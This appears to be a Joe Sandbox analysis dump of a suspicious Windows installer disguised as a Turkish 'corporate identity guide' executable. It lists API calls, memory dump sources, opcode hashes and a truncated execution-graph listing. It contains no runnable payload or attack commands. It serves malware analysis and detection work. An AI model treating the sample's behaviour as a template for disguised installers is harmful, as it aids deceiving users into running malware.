                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                          • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                          • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                          • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                          • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                                                          • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                          • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76FC3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D116A
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D11C7
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D11D9
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1203
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                          • Opcode ID: 8325cbeb03230fef2cb002c15c31db0a7715768238d7bc77469bf5a5473eb782
                                                                                                                                                                                          • Instruction ID: df95256d8af332be5af2164dd070d33f90c3c133c3320a7a04bd21767210746e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8325cbeb03230fef2cb002c15c31db0a7715768238d7bc77469bf5a5473eb782
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF3193B35002059FFB40AFBCD945A66B7EDFB56321B00462EF844D7254E736E911CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                          • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.2%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                          Signature Coverage:1.3%
                                                                                                                                                                                          Total number of Nodes:1649
                                                                                                                                                                                          Total number of Limit Nodes:31
38 API calls 6883->6884 6884->6862 6886 374d499b 28 API calls 6885->6886 6887 374d4bd2 6886->6887 6889 374d5af6 38 API calls 6888->6889 6890 374d7c24 6889->6890 6893 374d7a00 6890->6893 6894 374d7a28 6893->6894 6895 374d7a13 6893->6895 6894->6760 6895->6894 6897 374d7f0f 6895->6897 6898 374d7f1b 6897->6898 6899 374d5af6 38 API calls 6898->6899 6900 374d7f24 6899->6900 6901 374d7f72 6900->6901 6902 374d5671 RtlEnterCriticalSection 6900->6902 6901->6894 6903 374d7f42 6902->6903 6904 374d7f86 20 API calls 6903->6904 6905 374d7f56 6904->6905 6906 374d7f75 RtlLeaveCriticalSection 6905->6906 6907 374d7f69 6906->6907 6907->6901 6908 374d55a8 38 API calls 6907->6908 6908->6901 6909->6739 6913 374dad24 6910->6913 6912 374dadca 6912->6654 6914 374dad30 6913->6914 6924 374d8c7b RtlEnterCriticalSection 6914->6924 6916 374dad3e 6917 374dad65 6916->6917 6918 374dad70 6916->6918 6925 374dae4d 6917->6925 6920 374d6368 20 API calls 6918->6920 6921 374dad6b 6920->6921 6940 374dad9a 6921->6940 6923 374dad8d 6923->6912 6924->6916 6926 374d8d52 26 API calls 6925->6926 6927 374dae5d 6926->6927 6928 374dae63 6927->6928 6930 374dae95 6927->6930 6931 374d8d52 26 API calls 6927->6931 6943 374d8cc1 6928->6943 6930->6928 6932 374d8d52 26 API calls 6930->6932 6934 374dae8c 6931->6934 6935 374daea1 CloseHandle 6932->6935 6937 374d8d52 26 API calls 6934->6937 6935->6928 6938 374daead GetLastError 6935->6938 6936 374daedd 6936->6921 6937->6930 6938->6928 6939 374d6332 20 API calls 6939->6936 6952 374d8c9e RtlLeaveCriticalSection 6940->6952 6942 374dada4 6942->6923 6944 374d8d37 6943->6944 6945 374d8cd0 6943->6945 6946 374d6368 20 API calls 6944->6946 6945->6944 6951 374d8cfa 6945->6951 6947 374d8d3c 6946->6947 6948 374d6355 20 API calls 6947->6948 6949 374d8d27 6948->6949 6949->6936 6949->6939 6950 374d8d21 SetStdHandle 6950->6949 6951->6949 6951->6950 6952->6942 6953->6628 6954->6608 7677 374d508a 7678 374d509c 7677->7678 7679 374d50a2 7677->7679 7680 374d5000 20 API calls 7678->7680 7680->7679 
6955 374da945 6957 374da96d 6955->6957 6956 374da9a5 6957->6956 6958 374da99e 6957->6958 6959 374da997 6957->6959 6968 374daa00 6958->6968 6964 374daa17 6959->6964 6965 374daa20 6964->6965 6972 374db19b 6965->6972 6969 374daa20 6968->6969 6970 374db19b 21 API calls 6969->6970 6971 374da9a3 6970->6971 6973 374db1da 6972->6973 6977 374db25c 6973->6977 6982 374db59e 6973->6982 6975 374db286 6978 374db292 6975->6978 6989 374db8b2 6975->6989 6977->6975 6985 374d78a3 6977->6985 6980 374d2ada 5 API calls 6978->6980 6981 374da99c 6980->6981 6996 374db5c1 6982->6996 6986 374d78cb 6985->6986 6987 374d2ada 5 API calls 6986->6987 6988 374d78e8 6987->6988 6988->6975 6990 374db8bf 6989->6990 6991 374db8d4 6989->6991 6992 374db8d9 6990->6992 6994 374d6368 20 API calls 6990->6994 6993 374d6368 20 API calls 6991->6993 6992->6978 6993->6992 6995 374db8cc 6994->6995 6995->6978 6997 374db5ec 6996->6997 6998 374db7e5 RaiseException 6997->6998 6999 374db5bc 6998->6999 6999->6977 7176 374d7bc7 7177 374d7bd3 7176->7177 7178 374d7c0a 7177->7178 7184 374d5671 RtlEnterCriticalSection 7177->7184 7180 374d7be7 7185 374d7f86 7180->7185 7184->7180 7186 374d7f94 7185->7186 7187 374d7bf7 7185->7187 7186->7187 7192 374d7cc2 7186->7192 7189 374d7c10 7187->7189 7306 374d56b9 RtlLeaveCriticalSection 7189->7306 7191 374d7c17 7191->7178 7193 374d7d42 7192->7193 7197 374d7cd8 7192->7197 7194 374d7d90 7193->7194 7196 374d571e 20 API calls 7193->7196 7260 374d7e35 7194->7260 7198 374d7d64 7196->7198 7197->7193 7199 374d7d0b 7197->7199 7201 374d571e 20 API calls 7197->7201 7200 374d571e 20 API calls 7198->7200 7208 374d571e 20 API calls 7199->7208 7219 374d7d2d 7199->7219 7202 374d7d77 7200->7202 7206 374d7d00 7201->7206 7207 374d571e 20 API calls 7202->7207 7203 374d571e 20 API calls 7209 374d7d37 7203->7209 7204 374d7dfe 7210 374d571e 20 API calls 7204->7210 7205 374d7d9e 7205->7204 7211 374d571e 20 API calls 7205->7211 7220 374d90ba 7206->7220 7213 374d7d85 7207->7213 7214 374d7d22 7208->7214 7215 
374d571e 20 API calls 7209->7215 7216 374d7e04 7210->7216 7211->7205 7217 374d571e 20 API calls 7213->7217 7248 374d91b8 7214->7248 7215->7193 7216->7187 7217->7194 7219->7203 7221 374d90cb 7220->7221 7247 374d91b4 7220->7247 7222 374d90dc 7221->7222 7223 374d571e 20 API calls 7221->7223 7224 374d571e 20 API calls 7222->7224 7226 374d90ee 7222->7226 7223->7222 7224->7226 7225 374d9100 7228 374d9112 7225->7228 7229 374d571e 20 API calls 7225->7229 7226->7225 7227 374d571e 20 API calls 7226->7227 7227->7225 7230 374d9124 7228->7230 7232 374d571e 20 API calls 7228->7232 7229->7228 7231 374d9136 7230->7231 7233 374d571e 20 API calls 7230->7233 7234 374d9148 7231->7234 7235 374d571e 20 API calls 7231->7235 7232->7230 7233->7231 7236 374d915a 7234->7236 7237 374d571e 20 API calls 7234->7237 7235->7234 7238 374d916c 7236->7238 7240 374d571e 20 API calls 7236->7240 7237->7236 7239 374d917e 7238->7239 7241 374d571e 20 API calls 7238->7241 7242 374d9190 7239->7242 7243 374d571e 20 API calls 7239->7243 7240->7238 7241->7239 7244 374d91a2 7242->7244 7245 374d571e 20 API calls 7242->7245 7243->7242 7246 374d571e 20 API calls 7244->7246 7244->7247 7245->7244 7246->7247 7247->7199 7249 374d921d 7248->7249 7250 374d91c5 7248->7250 7249->7219 7251 374d91d5 7250->7251 7252 374d571e 20 API calls 7250->7252 7253 374d91e7 7251->7253 7255 374d571e 20 API calls 7251->7255 7252->7251 7254 374d91f9 7253->7254 7256 374d571e 20 API calls 7253->7256 7257 374d920b 7254->7257 7258 374d571e 20 API calls 7254->7258 7255->7253 7256->7254 7257->7249 7259 374d571e 20 API calls 7257->7259 7258->7257 7259->7249 7261 374d7e60 7260->7261 7262 374d7e42 7260->7262 7261->7205 7262->7261 7266 374d925d 7262->7266 7265 374d571e 20 API calls 7265->7261 7267 374d7e5a 7266->7267 7268 374d926e 7266->7268 7267->7265 7302 374d9221 7268->7302 7271 374d9221 20 API calls 7272 374d9281 7271->7272 7273 374d9221 20 API calls 7272->7273 7274 374d928c 7273->7274 7275 374d9221 20 API calls 7274->7275 7276 374d9297 
7275->7276 7277 374d9221 20 API calls 7276->7277 7278 374d92a5 7277->7278 7279 374d571e 20 API calls 7278->7279 7280 374d92b0 7279->7280 7281 374d571e 20 API calls 7280->7281 7282 374d92bb 7281->7282 7283 374d571e 20 API calls 7282->7283 7284 374d92c6 7283->7284 7285 374d9221 20 API calls 7284->7285 7286 374d92d4 7285->7286 7287 374d9221 20 API calls 7286->7287 7288 374d92e2 7287->7288 7289 374d9221 20 API calls 7288->7289 7290 374d92f3 7289->7290 7291 374d9221 20 API calls 7290->7291 7292 374d9301 7291->7292 7293 374d9221 20 API calls 7292->7293 7294 374d930f 7293->7294 7295 374d571e 20 API calls 7294->7295 7296 374d931a 7295->7296 7297 374d571e 20 API calls 7296->7297 7298 374d9325 7297->7298 7299 374d571e 20 API calls 7298->7299 7300 374d9330 7299->7300 7301 374d571e 20 API calls 7300->7301 7301->7267 7303 374d9258 7302->7303 7304 374d9248 7302->7304 7303->7271 7304->7303 7305 374d571e 20 API calls 7304->7305 7305->7304 7306->7191 7307 374da1c6 IsProcessorFeaturePresent 7000 374d8640 7003 374d8657 7000->7003 7004 374d8679 7003->7004 7005 374d8665 7003->7005 7007 374d8681 7004->7007 7008 374d8693 7004->7008 7006 374d6368 20 API calls 7005->7006 7009 374d866a 7006->7009 7010 374d6368 20 API calls 7007->7010 7014 374d8652 7008->7014 7016 374d54a7 7008->7016 7012 374d62ac 26 API calls 7009->7012 7013 374d8686 7010->7013 7012->7014 7015 374d62ac 26 API calls 7013->7015 7015->7014 7017 374d54c4 7016->7017 7023 374d54ba 7016->7023 7018 374d5af6 38 API calls 7017->7018 7017->7023 7019 374d54e5 7018->7019 7020 374d7a00 38 API calls 7019->7020 7021 374d54fe 7020->7021 7024 374d7a2d 7021->7024 7023->7014 7025 374d7a55 7024->7025 7026 374d7a40 7024->7026 7025->7023 7026->7025 7028 374d6d7e 7026->7028 7029 374d6d8a 7028->7029 7030 374d5af6 38 API calls 7029->7030 7035 374d6d94 7030->7035 7032 374d6e18 7032->7025 7033 374d55a8 38 API calls 7033->7035 7035->7032 7035->7033 7036 374d571e 20 API calls 7035->7036 7037 374d5671 RtlEnterCriticalSection 7035->7037 7038 374d6e0f 
7035->7038 7036->7035 7037->7035 7041 374d56b9 RtlLeaveCriticalSection 7038->7041 7040 374d6e16 7040->7035 7041->7040 7681 374d7a80 7682 374d7a8d 7681->7682 7683 374d637b 20 API calls 7682->7683 7684 374d7aa7 7683->7684 7685 374d571e 20 API calls 7684->7685 7686 374d7ab3 7685->7686 7687 374d7ad9 7686->7687 7688 374d637b 20 API calls 7686->7688 7689 374d5eb7 11 API calls 7687->7689 7692 374d7ae5 7687->7692 7690 374d7acd 7688->7690 7689->7687 7691 374d571e 20 API calls 7690->7691 7691->7687 7042 374daf43 7043 374daf4d 7042->7043 7044 374daf59 7042->7044 7043->7044 7045 374daf52 CloseHandle 7043->7045 7045->7044 7125 374d5303 7128 374d50a5 7125->7128 7137 374d502f 7128->7137 7131 374d502f 5 API calls 7132 374d50c3 7131->7132 7133 374d5000 20 API calls 7132->7133 7134 374d50ce 7133->7134 7135 374d5000 20 API calls 7134->7135 7136 374d50d9 7135->7136 7139 374d5048 7137->7139 7138 374d2ada 5 API calls 7140 374d5069 7138->7140 7139->7138 7140->7131 7141 374d7103 GetCommandLineA GetCommandLineW 7308 374d4bdd 7309 374d4bec 7308->7309 7310 374d4c08 7308->7310 7309->7310 7312 374d4bf2 7309->7312 7331 374d6d60 7310->7331 7314 374d6368 20 API calls 7312->7314 7316 374d4bf7 7314->7316 7315 374d4c33 7335 374d4d01 7315->7335 7317 374d62ac 26 API calls 7316->7317 7318 374d4c01 7317->7318 7323 374d4c66 7325 374d6368 20 API calls 7323->7325 7324 374d4c72 7326 374d4d01 38 API calls 7324->7326 7327 374d4c6b 7325->7327 7328 374d4c88 7326->7328 7329 374d571e 20 API calls 7327->7329 7328->7327 7330 374d571e 20 API calls 7328->7330 7329->7318 7330->7327 7332 374d6d69 7331->7332 7333 374d4c0f GetModuleFileNameA 7331->7333 7347 374d6c5f 7332->7347 7333->7315 7337 374d4d26 7335->7337 7339 374d4d86 7337->7339 7503 374d70eb 7337->7503 7338 374d4c50 7341 374d4e76 7338->7341 7339->7338 7340 374d70eb 38 API calls 7339->7340 7340->7339 7342 374d4e8b 7341->7342 7343 374d4c5d 7341->7343 7342->7343 7344 374d637b 20 API calls 7342->7344 7343->7323 7343->7324 7345 374d4eb9 7344->7345 7346 374d571e 20 
API calls 7345->7346 7346->7343 7348 374d5af6 38 API calls 7347->7348 7349 374d6c6c 7348->7349 7350 374d6d7e 38 API calls 7349->7350 7351 374d6c74 7350->7351 7367 374d69f3 7351->7367 7354 374d6c8b 7354->7333 7357 374d6cce 7360 374d571e 20 API calls 7357->7360 7360->7354 7361 374d6cc9 7362 374d6368 20 API calls 7361->7362 7362->7357 7363 374d6d12 7363->7357 7391 374d68c9 7363->7391 7364 374d6ce6 7364->7363 7365 374d571e 20 API calls 7364->7365 7365->7363 7368 374d54a7 38 API calls 7367->7368 7369 374d6a05 7368->7369 7370 374d6a14 GetOEMCP 7369->7370 7371 374d6a26 7369->7371 7372 374d6a3d 7370->7372 7371->7372 7373 374d6a2b GetACP 7371->7373 7372->7354 7374 374d56d0 7372->7374 7373->7372 7375 374d570e 7374->7375 7379 374d56de 7374->7379 7377 374d6368 20 API calls 7375->7377 7376 374d56f9 RtlAllocateHeap 7378 374d570c 7376->7378 7376->7379 7377->7378 7378->7357 7381 374d6e20 7378->7381 7379->7375 7379->7376 7380 374d474f 7 API calls 7379->7380 7380->7379 7382 374d69f3 40 API calls 7381->7382 7383 374d6e3f 7382->7383 7385 374d6e90 IsValidCodePage 7383->7385 7388 374d6e46 7383->7388 7390 374d6eb5 7383->7390 7384 374d2ada 5 API calls 7386 374d6cc1 7384->7386 7387 374d6ea2 GetCPInfo 7385->7387 7385->7388 7386->7361 7386->7364 7387->7388 7387->7390 7388->7384 7394 374d6acb GetCPInfo 7390->7394 7467 374d6886 7391->7467 7393 374d68ed 7393->7357 7395 374d6baf 7394->7395 7396 374d6b05 7394->7396 7398 374d2ada 5 API calls 7395->7398 7404 374d86e4 7396->7404 7400 374d6c5b 7398->7400 7400->7388 7403 374d8a3e 43 API calls 7403->7395 7405 374d54a7 38 API calls 7404->7405 7406 374d8704 MultiByteToWideChar 7405->7406 7409 374d8742 7406->7409 7415 374d87da 7406->7415 7408 374d2ada 5 API calls 7412 374d6b66 7408->7412 7410 374d8763 7409->7410 7411 374d56d0 21 API calls 7409->7411 7413 374d87d4 7410->7413 7416 374d87a8 MultiByteToWideChar 7410->7416 7411->7410 7418 374d8a3e 7412->7418 7423 374d8801 7413->7423 7415->7408 7416->7413 7417 374d87c4 GetStringTypeW 7416->7417 7417->7413 7419 
